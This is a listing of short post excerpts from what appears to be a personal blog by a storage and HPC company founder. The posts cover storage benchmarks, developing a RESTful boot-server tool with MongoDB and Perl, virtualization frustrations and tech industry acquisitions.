Check out the official site for more info. Take home messages for the soon to be announced system
and
What is this magical beast you ask? What are its configuration limits? You’ll have to wait for the official unveiling.
Posts
New benchmark results imminent
Will update once they are released. I can’t tell you numbers within. I can say that we are quite happy with the results. More (very) soon. I promise.
Posts
Heh ...
[ 
](http://www.businessinsider.com/scott-adams-favorite-dilbert-comics-2013-10)
Posts
This would be funny if it weren't sad
Over on the pfSense mailing list there is a serious level of tin-foil-hat (TFH) and rampant paranoia, coupled with extreme lack of etiquette on the part of the TFH brigade. And, to make it more enjoyable, at least one overt and humorous case of attempted cyber bullying against me personally for imploring people to stop hijacking a technical discussion list, as well as people decrying a faux oppression from people whom are genuinely wanting the list to return to its technical roots.
Posts
Starting to build the Tiburon Data Store
This is fun, basically something that I’ve wanted to do, and it gets me closer to the point where I’ve wanted to be for a while … building TREDS (Tiburon REliable Data Store). Code is up in the IDE, and I am building the CRUD and metadata portions now. If all goes well (it never does), we should be storing/retrieving objects soon. Very exciting …
Posts
More benchmarking goodness coming
A new round of industry standard benchmarks coming soon for some of our kit. Well, its technically our appliance built from that platform, but you’ll be hearing more on that soon. Very exciting times … you’ll hear more about this soon.
Posts
Moving more of our infrastructure to our dog food ...
Many of our functions are hosted on our Virtualization appliance. Our firewall is now running on a siRouter appliance. As always, our internal storage is JackRabbit, and our internal backup is DeltaV. We’ll be talking more about all of this in short order. Needless to say, I am quite pleased about this. [update] spoke too soon .. discovered a routing failure that was masked in the appliance. Reverting to the old setup until we can address.
Posts
Wonderful changes in Tiburon-RESTful
I’ve been rewriting Tiburon to provide a completely sane restful interface. It still does what it did before, but now … it does it so much more nicely! First: I got rid of the config file. Some folks were having trouble with JSON config files. Creating them is very easy, they are key value stores in 90% of the cases, with the remaining 10% being a “default” key, and then the value.
Posts
RESTful tiburon tagged
as Alaskan Malamute v0.10. I’m a dog guy, what can I say. Hopefully full boot server semantics will be done by end of weekend.
Posts
Starting to really enjoy using MongoDB as a document store
There are a few gotcha’s that I am working through. But apart from these (mostly oddities in the interface between Perl and MongoDB), this is making Tiburon RESTful development go much better. I’ve just started to scratch the surface of what the combined thing will do.
landman@lightning:~/work/development/tiburon/t$ ./version.pl result = $VAR1 = '{ "version" : "0.1", "label" : "Alaskan Malamute" }'; and
landman@lightning:~/work/development/tiburon/t$ ./list_boot_servers.pl result = $VAR1 = ' [ { "hostport" : "3001", "_id" : "523d540e9745f48429000000", "name" : "test1", "default" : "false", "hostname" : "10.
Posts
Ahhh ... the joy that is being used as a 2 by 4
I didn’t quite see this one in all its glory, but had an inkling that things were not as they appeared to be. Annoying, but one lives, learns, and continues. No details.
Posts
... and Nirvanix shutters ...
Traction, paying customers, revenue and cashflow are what matter to small businesses looking to grow up. In many ways we (the day job) were lucky as we built a sustainable business first, with real customers and real revenue. Most startups don’t do that. They have a change the world idea, and then try to evangelize this whilst building a business. Sometimes they have to “pivot” or … change focus to an idea that will work at turning into a business.
Posts
Worlds first low latency cloud
PR from the day job. Remember I’ve been dying to tell people about the ultra cool project we’ve been working on for the last year? Well, this is it. More soon, but I am thrilled we can talk about it now!
Posts
Why is Java used in teaching programming in high schools?
Seriously … My daughter is taking a computer class, and for reasons I cannot fathom, they are using an AP Java book (an old one at that, written when Java 5 was new), and more importantly and more concerningly, the Java language itself. I’ve got many qualms about using Java for teaching (or development, but thats for other posts). For new students, early exposure to its rigid and verbose … one might argue … excessively verbose … syntax and structure, don’t quite lend themselves to an understanding of how algorithms and computers work.
Posts
Slight annoyance with argument processing
Tiburon as a service. I’ll talk about this at some point, and describe what I mean, but I have to say that I’ve been blown away by the response to it from many places and customers. I’ve been working on making the API restful, and finally … finally … incorporating a noSQL DB on the back end to make the replication and other bits trivial. We are using MongoDB for this.
Posts
Bitten by VirtualBox yet again, moving to kvm
I like VirtualBox. Have for a long time. But it has some … well … interesting failure modes. Including some that have locked up my host machine. The problem for me is that I’ve got my Windows desktop environment for my normal desktop hosted there. And I need this every now and then. Today was the final straw. Working on a document about some of our updates in Word. I don’t like Word, but some of our partners use it, and its easier to use it than to fight the battle convincing them to use LibreOffice.
Posts
More M&A
Two items.
our friends at Virident are now part of WD. I am happy Kumar, Yatin and crew got a nice exit. I am not thrilled at where they landed. Virident joins STEC at WD. But as with STEC, this looks like this is on the HGST side of things, which appears to still be building separate and quality product. We will buy and ship HGST. Whiptail was acquired by Cisco.
Posts
Special at the party after HPC on Wall Street
The worlds first low latency drink to go with the next generation low latency cloud … the Scalable low latentini. Yes, its real …
Posts
Definitely having one of those days
Massive frustration on multiple fronts, and a few unwelcome surprises. I wish I had karate tonight, and fight night in particular. Lots to work off. I’ll have to be satisfied with weight training tomorrow, and a nice long dog walk tonight.
Posts
More M&A: Microsoft buys Nokia
This one was almost obvious, it was simply a matter of “when”. Microsoft is trying to put some wood behind its Mobile OS arrow. No one seems to want it, save for the 41MP camera “phone”. In the big picture, Microsoft saw the beginning of an erosion of its market power recently, as more people opted for mobile platforms, and fewer opted for PCs and laptops. There is a convenience and cost play going on at the same time.
Posts
Latest DeltaV benchmarks
24 bay system, big RAID6. Reads/write 4x RAM size.
[root@dv4-3 ~]# df -h /data Filesystem Size Used Avail Use% Mounted on /dev/md2 55T 65G 55T 1% /data ... WRITE: io=65505MB, aggrb=1580.2MB/s, minb=1580.2MB/s, maxb=1580.2MB/s, mint=41433msec, maxt=41433msec READ: io=65505MB, aggrb=2429.4MB/s, minb=2429.4MB/s, maxb=2429.4MB/s, mint=26964msec, maxt=26964msec
Posts
Spot on discussion of a fake crisis
Over at IEEE Spectrum, there is a wonderful article that delves into the latest phase of the alleged massive need for more STEM workers. This is a topic I’ve covered a number of times, here, here, here, and here. TL;DR version for newbies: If someone is trying to sell you on this to get you to decide to go get an STEM degree, then there’s a pretty good probability you are in the process of being deceived.
Posts
Why I've not been posting
Just insanely busy, more so than usual. We are getting close to double digits in employees in the day job. I suspect we’ll cross this in September/October. More news soon, including some wonderful new partners, products, and business bits. I won’t say where at this moment, but you can start searching around for the SI logo on a few folks sites …
Posts
Entrepreneurs are optimists
This is something I’ve been meaning to write about for a while. There are many reasons one might decide to be an entrepreneur. For me the journey was fairly simple. In graduate school, I saw the sea change in my field with the influx of FSU scientists with much greater seniority, many more publications, etc. taking up postdoc and tenure track positions around the time I finished up. I knew I had to alter my vision of what I wanted to do in my professional career, and happily SGI came along and gave me the opportunity to spend time in industry.
Posts
Day job at HPC on Wall Street
Ok, this is getting to be a common theme. We go to HPC on Wall Street. We show off new kit. And we are hosting a party. Go figure. There will be more on this very soon. You will see the new kit at our new large booth at SC13. The first element of the new kit is a software defined networking powerhouse behind a new global financial cloud. The group building out the cloud will be there with us, ready to talk to people about what they are doing, and why financial types should sign up for this cloud.
Posts
NextIO shuts its doors and liquidates
As seen here and here.
There are lessons to be learned, and wisdom had from the articles. As the founder noted
Posts
bitten yet again by ancient packages in CentOS (and RHEL)
This is not a CentOS issue in that they merely rebuild the RHEL sources without the copyrighted bits. But its getting to the point where the RHEL bits are so badly out of date, that the platform is rapidly getting to the point of unusability. When I have to rebuild packages from source, as no up-to-date patched source RPM or even binary RPM exists for little used packages such as, I dunno … apache?
Posts
how not to write driver Makefiles or configuration scripts
if [uname -r eq ...] Its very bad form to insist on very particular versions of an OS/kernel. Not only will you piss off your customer (me), you will cause a great deal of effort to unwind the ill-considered test in order to get even basic functionality. I’ve seen this on network cards, RAID cards, you name it. It increases your support load, decreases the likelihood that you can actually support whats out there … say for example, someone does a ‘yum update’ and gets an updated kernel.
Posts
A cri de couer for Perl
As seen here. I enjoy developing code in Perl. I know, I know, its “the write only language” and “looks like line noise”. It has endured some rather nasty FUD in its day, and yet, it keeps on growing in use. It is just an incredibly powerful, quite expressive language. One which enables you to write very terse code if you wish. But the presentation isn’t concerned with terseness, but with development into a modern programming language.
Posts
The day job is 11 years old
Last year, I had been incensed at this time, by a US presidential candidate and mindset from him who told me, and every other entrepreneur out there, that “we didn’t build it”. It was a foolish thing for him to say, foolish for his party and fellow travelers to echo. Yet echo it they did. I quietly promised myself to double down on my hard work, the work I did, and see if I could smash the previous years smashing financial records.
Posts
and the M&A accelerates
NVidia grabs the Portland Group. This makes sense, as NVIdia has had CUDA, which is LLVM based, and needed a more general purpose compiler technology. There is nothing wrong with CUDA, but its very GPU specific. PGI tech allows them to talk very generally, and get support for non-GPU hardware acceleration. Such as massive collections of ARM. I expect more M&A; and investment activity over the next few months.